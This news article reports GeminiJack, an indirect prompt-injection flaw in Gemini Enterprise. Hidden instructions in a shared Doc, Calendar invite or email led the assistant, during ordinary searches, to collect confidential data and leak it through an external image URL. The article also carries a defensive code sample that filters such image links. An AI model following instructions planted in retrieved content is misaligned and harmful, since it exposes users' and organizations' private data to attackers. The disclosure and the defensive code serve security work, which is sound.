GeminiJack Flaw Shows How A Single Poisoned Workspace File Could Hijack Enterprise AI Searches

Noma Labs uncovers an architectural flaw in Gemini Enterprise’s retrieval pipeline that enabled zero-click data exfiltration across Gmail, Docs, and Calendar.

Published on Dec 9, 2025

A newly disclosed vulnerability in Google’s Gemini Enterprise platform exposed how retrieval-augmented generation can be weaponized to turn an AI assistant into a covert data-leak channel.

The issue, dubbed GeminiJack by Noma Labs, allowed attackers to plant hidden instructions inside a shared Google Doc, Calendar invite, or Gmail message.

When any employee later used Gemini Enterprise to run a standard search, the system automatically retrieved the poisoned content and executed those instructions with the employee’s permissions.

The flaw stems from how Gemini Enterprise and the former Vertex AI Search system mixed retrieved content with user prompts.

The model treated injected text as legitimate instructions, enabling an attacker to direct the AI to search for sensitive information, such as financial plans, acquisition discussions, customer data, or confidential documents, and then embed the results in an external image request. Because browsers routinely load images, the exfiltration appeared indistinguishable from normal traffic.
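One defensive control against the exfiltration step described above is to filter image references out of assistant output before it is rendered. The following is an added example, not code from Noma Labs or Google; the allowlisted host, the function names, and the sample output are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host the assistant UI may load images from.
ALLOWED_IMAGE_HOSTS = {"assets.corp.example"}

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)")
HTML_IMAGE = re.compile(r"<img\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)[^>]*>", re.I)

# Constructed sample of assistant output, not captured from a real system.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for. "
    "![status](https://img.attacker.example/p.png?q=Q3+acquisition+budget) "
    '<img src="https://assets.corp.example/logo.png">'
)


def _split(url):
    """Parse a URL; malformed input is treated as untrusted."""
    try:
        parts = urlsplit(url)
        return parts.scheme, (parts.hostname or "").lower(), parts.query
    except ValueError:
        return "", "", ""


def sanitize_assistant_output(text):
    """Return (safe_text, findings); non-allowlisted images are removed."""
    findings = []

    def check(match):
        url = match.group(1)
        scheme, host, query = _split(url)
        if scheme == "https" and host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep trusted image untouched
        # Query length is logged because the leaked data rides in the URL.
        findings.append({"host": host, "query_len": len(query), "url": url})
        return "[image removed: untrusted host]"

    text = MD_IMAGE.sub(check, text)
    text = HTML_IMAGE.sub(check, text)
    return text, findings


if __name__ == "__main__":
    safe, hits = sanitize_assistant_output(SAMPLE_OUTPUT)
    print(safe)
    print(hits)
```

The findings list is meant to feed monitoring: an image reference to an unknown host with a long query string in assistant output is a signal worth alerting on even when the image is blocked.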

Google confirmed the findings, collaborated on the investigation, and deployed architectural changes. Vertex AI Search is now fully separated from Gemini Enterprise, and both systems have updated retrieval and indexing interactions to prevent instruction/content confusion. The company documented the fix in an advisory published today.

A New Class of AI-Native Exposure

The research demonstrates how indirect prompt injection can bypass traditional defenses. No clicks were required: employees merely performed everyday searches. No malware, credential theft, or policy violations occurred. DLP systems saw only a routine AI query, followed by a normal image load.

Jason Soroko, Senior Fellow at Sectigo, told Expert Insights that once an AI assistant can read across Workspace services, it becomes “a new high privilege access layer,” and that a poisoned file “can silently turn that assistant into an exfiltration channel.” He emphasized that this represents a broader architectural challenge where models act on untrusted content pulled from internal systems.

GeminiJack shows how AI systems with broad, persistent data access can expand the blast radius of prompt injection. As organizations adopt retrieval-driven assistants, they will need stronger content validation, tighter data-source permissions, and monitoring designed for AI behaviors, not just user behaviors.